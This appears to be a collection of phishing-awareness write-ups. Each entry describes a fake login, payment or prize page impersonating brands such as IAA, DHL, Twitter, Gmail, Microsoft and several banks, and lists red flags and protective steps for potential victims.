IAA phishing page detected (Online car marketplace)

This screenshot shows a phishing page impersonating IAA (Insurance Auto Auctions) , a legitimate online vehicle auction platform. The page is designed to steal victims’ login credentials (email and password) used to access their IAA accounts.

Threat Analysis: IAA Phishing – Credential Harvesting

How it works:
The victim receives a phishing email, SMS, or message claiming an issue with their IAA account (e.g., a bid alert, payment problem, or account suspension). The link leads to this fake login page. The victim enters their email and password and clicks “Log In.” The credentials are captured and sent to the attacker.

The goal:
The attacker aims to steal IAA account credentials to:

  • Access the victim’s auction account
  • View bidding history, payment information, and personal data
  • Place fraudulent bids or transfer vehicles
  • Use the same email/password combination to compromise other accounts (if the victim reuses credentials)

Red flags to watch for:

  • Suspicious URL: The page is hosted on videooprema.in.rs/iaai.com/ – this is not the official IAA domain. Legitimate IAA login pages are on iaai.com or regional subdomains (e.g., buy.iaai.com).
  • Generic design: The page is minimal and lacks the full branding, security notices, and personalized elements found on the real IAA login page.
  • No multi‑factor authentication prompt: IAA supports MFA; a genuine login page may prompt for a second factor after credentials – this page does not.
  • Unsolicited login request: IAA does not send links requiring users to log in to resolve account issues.

What to do if you encounter this:

  • Do not enter your email or password.
  • If you are an IAA customer, always access the site by typing iaai.com directly into your browser.
  • If you have already entered your credentials, change your IAA password immediately. If you use the same password elsewhere, change those accounts as well. Enable two‑factor authentication on your IAA account if available.
  • Report the phishing page to IAA’s security team.

Protective measures:

  • Bookmark the official IAA login page and use that bookmark.
  • Use a password manager – it will autofill only on legitimate domains.
  • Enable two‑factor authentication on your IAA account and email.
  • Be suspicious of any unsolicited message that asks you to log in.

DHL phishing page revealed

This screenshot shows a phishing page impersonating DHL, targeting users with a fake package delivery notification. The scam demands a small payment (1.99) to complete delivery and collects full card details, cardholder name, and an ID number (likely a national ID or passport).

Threat Analysis: DHL Phishing – Fake “Delivery Confirmation” & Card Harvesting

How it works:
The victim receives an SMS or email claiming a package is in transit and requires a small payment to complete delivery. The link leads to this page, which mimics DHL tracking interface. It displays:

  • A fake tracking code
  • A fake status (“in delivering”)
  • A message urging payment within a limited time (14 days)

The victim is asked to provide:

  • Cardholder name
  • ID number (national identification)
  • Full credit card number
  • Expiration date (MM/YY)
  • CVV (CVC)

The goal:
The attacker captures:

  • Full credit/debit card details (number, expiry, CVV)
  • Cardholder name and ID number – which can be used for identity theft or to answer security questions
  • The small payment request (1.99) is intended to lower suspicion

Red flags to watch for:

  • Suspicious URL: The page is hosted on a domain that is not dhl.com or an official DHL domain.
  • Request for CVV and ID number: DHL never asks for your card security code or national ID to confirm a delivery.
  • Small fee trick: 1.99 is a trivial amount meant to make the payment seem insignificant.
  • Fake tracking code: The tracking code cannot be verified on the real DHL website.
  • Poor English / formatting: The page contains grammatical inconsistencies that would not appear on an official DHL page.

What to do if you encounter this:

  • Do not enter any personal, ID, or card information.
  • If you are expecting a DHL shipment, track it directly by typing dhl.com into your browser.
  • If you have already entered card details, contact your bank immediately to block the card.
  • Report the phishing page to DHL’s fraud team.

Protective measures:

  • Never click links in unsolicited delivery messages. Always go directly to the official courier website.
  • Never pay a “redelivery fee” via a link. Legitimate fees are handled in person or through the official site after logging in.
  • Check the URL carefully: Official DHL domains end with dhl.com or country-specific variants like dhl.de.
  • Enable transaction alerts on your bank account.

Twitter fake login page detected

This screenshot shows a phishing page impersonating Twitter (now X) , designed to steal login credentials (email/phone/username and password). The page is hosted on a suspicious domain unrelated to Twitter.

Threat Analysis: Twitter Phishing – Credential Harvesting

How it works:
The victim receives a phishing email, SMS, or direct message claiming a security alert, account suspension, or unusual login activity. The link leads to this fake Twitter login page. The victim enters their phone, email, or username and password, then clicks “Login.” The credentials are captured and sent to the attacker.

The goal:
The attacker steals Twitter account credentials to:

  • Access private messages and personal information
  • Post spam or malicious links from a trusted account
  • Spread the phishing attack to the victim’s followers
  • Use the same email/password combination to compromise other accounts (if credentials are reused)

Red flags to watch for:

  • Suspicious URL: The page is hosted on obgyn.click, not twitter.com or x.com. Legitimate Twitter login pages are only on official domains.
  • Generic design: The page mimics Twitter’s interface but lacks the full security indicators (e.g., proper SSL certificate, official footer links).
  • Unsolicited login request: Twitter does not send links requiring users to log in to resolve account issues.
  • No two‑factor authentication prompt: A real login page may ask for a second factor after credentials; this page does not.

What to do if you encounter this:

  • Do not enter your login credentials.
  • If you have already entered them, change your Twitter password immediately and enable two‑factor authentication (2FA). Also change any other accounts that use the same password.
  • Always access Twitter by typing twitter.com or x.com directly into your browser.

Protective measures:

  • Bookmark the official Twitter login page and use that bookmark.
  • Use a password manager – it will not autofill on fake domains.
  • Enable two‑factor authentication on your Twitter account (using an authenticator app or security key, not SMS).
  • Be suspicious of any unsolicited message that asks you to log in.

Gmail phishing page detected

This screenshot shows a phishing page impersonating Google / Gmail, targeting users who read Arabic and French (likely in North Africa or the Middle East). The page asks for email/phone and password to steal login credentials.

Threat Analysis: Google/Gmail Phishing – Credential Harvesting

How it works:
The victim receives a phishing email, SMS, or message claiming a security alert, account issue, or the need to verify their information. The link leads to this page, which mimics the Gmail login interface. The victim enters their email/phone and password, then clicks “LOGIN.” The credentials are captured and sent to the attacker.

The goal:
The attacker steals Google account credentials to:

  • Access Gmail (searching for sensitive information, password reset links)
  • Compromise other Google services (Drive, Photos, etc.)
  • Use the account to send further phishing messages to the victim’s contacts
  • Attempt credential reuse on other platforms

Red flags to watch for:

  • Suspicious URL: The page is hosted on a domain that is not google.com or accounts.google.com.
  • Mixed languages: The page uses Arabic for the title (“تسجيل الدخول” – login) but French for the field labels (“Gmail ou téléphone”). Official Google login pages are consistently localized in one language.
  • Minimal design: The page lacks Google’s full branding, security notices, and two‑factor authentication options.
  • No personalization: Legitimate Google login pages often show a security image or account selection after entering an email.
  • Unsolicited login request: Google does not send links requiring users to log in to resolve account issues.

What to do if you encounter this:

  • Do not enter your email/phone or password.
  • If you have already entered your credentials, change your Google password immediately and enable two‑factor authentication (2FA).
  • Always access Gmail by typing gmail.com directly into your browser.

Protective measures:

  • Bookmark the official Google login page and use that bookmark.
  • Use a password manager – it will autofill only on legitimate google.com domains.
  • Enable two‑factor authentication on your Google account (using an authenticator app or security key).
  • Be suspicious of any unsolicited message that asks you to log in.

Fake Microsoft account creation page detected

This phishing campaign utilizes a high-fidelity clone of the Microsoft account creation page to steal user credentials, personal data, and backup contact information under the guise of creating a new profile. The fake form, which often appears after clicking a deceptive link, captures the “new” password, which is frequently a recycled, primary password, along with PII that can be used to bypass 2FA on actual accounts. To stay safe, users should always verify that the URL resides on microsoft.com, live.com, or outlook.com and manually type addresses rather than clicking links.

Screenshot #1: The Data Entry Form

The Trap: The page is a pixel-perfect replica of the live.com registration screen. It asks for a new email address and a password.

The Psychology: Victims feel safe because they think they are creating information, not giving it away. However, most people use the same 1–2 passwords for everything. Once you click “Next,” your “new” password is sent directly to the attacker’s server.

Screenshot #2: Personal Data Collection

The Trap: After the password, the kit asks for First Name, Last Name, and Date of Birth.

The Intent: This is “Fullz” harvesting. This data is used to answer security questions on your real accounts or to perform identity theft and open fraudulent credit lines.

Screenshot #3: Verification & Backup Data

The Trap: The final step often asks for a Backup Email or Phone Number.

The Impact: By capturing your recovery methods, the attacker can try to take over your other accounts (Gmail, Facebook, Bank) by initiating password resets using the phone number or backup email you just provided.

Then user will be redirected to the true Microsoft website:

Fake Microsoft Account Creation Page

Target: Global users of Outlook, OneDrive, and Azure services.
Threat Level: Critical (Credential Harvesting & Identity Theft)

Phishing Method Description

This attack targets users by mimicking the official Microsoft account creation (Sign-up) flow. Instead of stealing an existing password, scammers trick victims into “registering” for a new service or “validating” their identity. The goal is to capture a fresh set of credentials (Email + Password) which the victim likely reuses for other sensitive accounts.

Protection Measures

  • 1. Check the Top-Level Domain (TLD):
    Official Microsoft registration only happens on microsoft.com, live.com, or outlook.com. If you see a URL like microsoft-account-verify.net or signup-live.xyz, close the tab immediately.
  • 2. The “Recycled Password” Danger:
    Never use your primary password when “registering” for a new, unknown service. Scammers rely on the fact that you will likely use your “standard” strong password, which they can then test against your banking and social media accounts.
  • 3. Look for the “Padlock” and Certificate:
    While many phishing sites now use HTTPS (the lock icon), you can click it to see who the certificate was issued to. If it’s a random string of characters or an unrelated company, it’s a scam.
  • 4. Use a Password Manager:
    A password manager (like Bitwarden or 1Password) will refuse to auto-fill your data if the domain is even slightly different from the real one. This is your best technical defense against lookalike sites.

Fake increasing of Instagram subscribers in Thai

This screenshot shows a phishing page in Arabic that promises to increase the number of followers for a social media account (likely Instagram, TikTok, or Twitter). The victim is asked to provide their username, password, and desired number of followers – a classic credential‑harvesting scam.

Threat Analysis: Social Media Follower Booster Phishing – Credential Harvesting

How it works:
The victim encounters an ad, email, or direct message promoting a free or cheap service to gain thousands of followers instantly. The link leads to this page, which asks for:

  • Username (social media login name)
  • Password
  • Desired number of followers (to make the offer seem customizable)

After the victim submits this information, the attacker captures the credentials. The victim may be redirected to a fake “processing” page or asked to complete a “verification” (e.g., a human verification survey), but the damage is already done.

The goal:
The attacker steals social media account credentials to:

  • Take over the account and lock out the original owner
  • Post spam, scams, or malicious links from a trusted account
  • Use the account to send phishing messages to the victim’s followers
  • Sell the account or its data on criminal markets

Red flags to watch for:

  • Suspicious URL: The page is hosted on a domain that is not the official social media platform (e.g., not instagram.com, tiktok.com, or twitter.com).
  • Request for password: No legitimate follower‑boosting service requires your account password. This is always a scam.
  • Too good to be true offer: Promises of instant, free, or cheap followers are classic lures for credential theft.
  • Poor design and generic Arabic phrasing: The page lacks the branding and security features of the real platform.

What to do if you encounter this:

  • Do not enter your username or password.
  • If you have already entered your credentials, change your password immediately on the real social media platform. Enable two‑factor authentication (2FA) if available.
  • Report the phishing page to the social media platform being impersonated.

Protective measures:

  • Never share your password with any third‑party service claiming to boost followers, likes, or views.
  • Use a password manager – it will not autofill on fake domains.
  • Enable two‑factor authentication on all social media accounts.
  • Be suspicious of any unsolicited offer that promises easy growth for your account.

Lowe’s fake winning page detected

This screenshot shows a lottery or prize scam impersonating Lowe’s, a major home improvement retailer. The message claims the victim has won a prize and includes a fake customer number. The scam typically demands a small “delivery fee” to release the prize – which is never actually delivered.

Threat Analysis: Lowe’s Prize Scam – Advance Fee Fraud

How it works:
The victim receives an unsolicited email, SMS, or social media message claiming they have won a prize (often a gift card, appliance, or cash) from Lowe’s. A “customer number” is provided to make the notification appear legitimate. The message mentions that a delivery fee may apply. If the victim responds or clicks a link, they will be asked to pay a small fee (e.g., $5–$20) to “cover shipping” or “processing” before receiving the prize. After the fee is paid, the victim never receives the promised prize – and their payment information may be stolen.

The goal:
The attacker aims to:

  • Trick the victim into sending money (advance fee fraud)
  • Collect credit card or bank account details if the victim pays online
  • Gather personal information (name, address, phone) for identity theft or further scams

Red flags to watch for:

  • Unsolicited win notification: Legitimate sweepstakes do not notify winners via random text messages or social media DMs without prior entry.
  • Request for upfront payment: A real prize never requires a delivery or processing fee to be paid by the winner. The sponsor covers these costs.
  • Fake customer number: The provided number (#4864370221) is generic and cannot be verified with any legitimate Lowe’s promotion.
  • Vague prize description: The message does not specify what the winner has actually won – only that they are a “winner.”
  • Poor formatting and grammar: Official Lowe’s communications are professionally written; this message uses generic capitalization and lacks official branding.

What to do if you encounter this:

  • Do not reply, click any links, or call any phone number provided.
  • Do not pay any “delivery fee” or share personal / financial information.
  • If you are unsure whether a Lowe’s promotion is legitimate, contact Lowe’s directly through their official website (lowes.com) – never use contact details from the suspicious message.
  • Report the scam to the Federal Trade Commission (FTC) or your local consumer protection agency.

Why this scam is effective:
The promise of a free prize excites victims, and a small delivery fee seems reasonable. Many people are familiar with Lowe’s and trust the brand. The fake customer number adds a veneer of authenticity. Scammers rely on urgency and the fear of missing out to bypass critical thinking.

Protective measures:

  • Remember: you cannot win a prize you did not enter. If you never signed up for a Lowe’s sweepstakes, ignore any win notification.
  • Never pay money to receive a prize. Legitimate contests cover all costs.
  • Delete unsolicited win messages without responding.
  • Check the sender’s address – official Lowe’s emails come from @lowes.com, not random domains.

BancoFie phishing page detected

This screenshot shows a phishing page impersonating Banco Fie, a Bolivian bank. The page mimics the bank’s “Fienet” online banking login interface to steal customers’ USUARIO (username) and Contraseña (password).

Threat Analysis: Banco Fie Phishing – Fake “Fienet” Login Page

How it works:
The victim receives a phishing email, SMS, or other message claiming a security alert, account issue, or the need to verify their information. The link leads to this fake Banco Fie login page. The victim is asked to enter their username and password and click “Continuar.” The credentials are captured and sent to the attacker.

The goal:
The attacker aims to steal online banking credentials to access the victim’s real account, view balances, transfer funds, and commit fraud.

Red flags to watch for:

  • Suspicious URL: The page is hosted on a domain that is not bancofie.com.bz or the official Banco Fie domain. Always check the address bar.
  • Unsolicited login request: Banco Fie does not send links requiring customers to log in to resolve account issues. Customers should always access online banking by typing the official URL directly.
  • Fake security badges: The “secure,” “GlobalSign,” and “GMO” icons are copied from legitimate sites but do not guarantee safety – they are just images on a fake page.
  • No personalization or security image: Legitimate Banco Fie login pages often display a security phrase or image after username entry. This page lacks that.
  • Copied contact information: The footer includes a real customer service phone number and website, but attackers copy these to appear legitimate. Their presence does not make the page safe.

What to do if you encounter this:

  • Do not enter your username or password.
  • If you are a Banco Fie customer, always access Fienet by typing bancofie.com.bz directly into your browser.
  • If you have already entered your credentials, contact Banco Fie immediately through their official customer service hotline to change your password and secure your account.
  • Report the phishing page to Banco Fie’s fraud department.

Protective measures:

  • Bookmark the official Banco Fie login page and use that bookmark exclusively.
  • Use a password manager – it will autofill only on legitimate domains.
  • Enable two‑factor authentication on your bank account if available.
  • Be suspicious of any unsolicited message that creates urgency and asks you to log in.

Bank of America phishing page in Spanish revealed

This screenshot shows a phishing page impersonating Bank of America, targeting Spanish‑speaking customers. The page mimics the bank’s online login interface to steal online banking credentials (Identificación en línea and Contraseña).

Threat Analysis: Bank of America Phishing – Fake Spanish‑Language Login Page

How it works:
The victim receives a phishing email, SMS, or other message claiming a security alert, account issue, or the need to verify their information. The link leads to this fake login page. The victim is asked to enter their online ID and password and click “Entrar.” The credentials are captured and sent to the attacker.

The goal:
The attacker aims to steal online banking credentials to access the victim’s real Bank of America account, view balances, transfer funds, and commit fraud.

Red flags to watch for:

  • Suspicious URL: The page is hosted on a domain that is not bankofamerica.com. Legitimate Bank of America login pages are only on official bank domains.
  • Unsolicited login request: Bank of America does not send links requiring customers to log in to resolve account issues.
  • Outdated copyright: The footer shows “© 2021” – a phishing page often copies an old year. The real site would show the current year.
  • No personalization or security image: Legitimate Bank of America login pages display a security image or phrase after you enter your online ID. This page lacks that feature.
  • Copied content: The page uses real Bank of America branding and slogans (“Área protegida,” “Miembro de FDIC”), but these are copied from the legitimate site and do not guarantee safety.

What to do if you encounter this:

  • Do not enter your online ID or password.
  • If you are a Bank of America customer, always access online banking by typing bankofamerica.com directly into your browser.
  • If you have already entered your credentials, contact Bank of America immediately to change your password and secure your account.
  • Report the phishing page to Bank of America’s fraud team (e.g., [email protected]).

Protective measures:

  • Bookmark the official Bank of America login page and use that bookmark.
  • Use a password manager – it will autofill only on legitimate bankofamerica.com domains.
  • Enable two‑factor authentication on your bank account.
  • Be suspicious of any unsolicited message that asks you to log in.

Preparation to Credit Agricole bank phishing attack revealed

This screenshot shows a phishing email or landing page impersonating Crédit Agricole, a major French bank. The message uses the legitimate “SécuriPass” security feature and the European PSD2 directive as a pretext to pressure victims into clicking a malicious activation button.

Threat Analysis: Crédit Agricole Phishing – Fake “SécuriPass Activation” Scam

How it works:
The victim receives an unsolicited email (or lands on this page via a link) claiming that due to the PSD2 directive, strong authentication is required every 90 days. The message urges the victim to click a button to activate “SécuriPass” and warns that ignoring the activation will release the bank from liability for any account damage.

Clicking the button leads to a fake Crédit Agricole login page designed to steal the victim’s online banking credentials and potentially two‑factor authentication codes.

The goal:
The attacker aims to capture the victim’s Crédit Agricole login credentials to access the account, transfer funds, and commit fraud.

Red flags to watch for:

  • Suspicious URL: The link behind the button leads to a domain that is not credit-agricole.fr. Legitimate bank communications use official domains.
  • Threat of consequences: The warning that the bank “will not be responsible for damages” is a classic fear tactic to pressure victims into clicking without thinking.
  • Unsolicited activation request: Crédit Agricole does not send emails or messages requiring customers to click a link to activate SécuriPass. Legitimate activation happens within the app or after logging in.
  • Generic greeting: The message does not address the victim by name or reference a specific account.
  • Misspelling: “NOTIFICATIATION” instead of “Notification” is a minor but telling error.

What to do if you encounter this:

  • Do not click the activation button or any links.
  • Access your Crédit Agricole account by typing credit-agricole.fr directly into your browser or using the official mobile app.
  • If you have already clicked and entered your credentials, contact Crédit Agricole immediately to secure your account.
  • Report the phishing page to Crédit Agricole’s fraud team ([email protected]).

Protective measures:

  • Never click links in unsolicited messages claiming you need to activate security features.
  • Always type your bank’s official website address directly into your browser.
  • Enable SécuriPass through the official app – not via email links.
  • Be suspicious of any message that threatens negative consequences and asks you to click a link.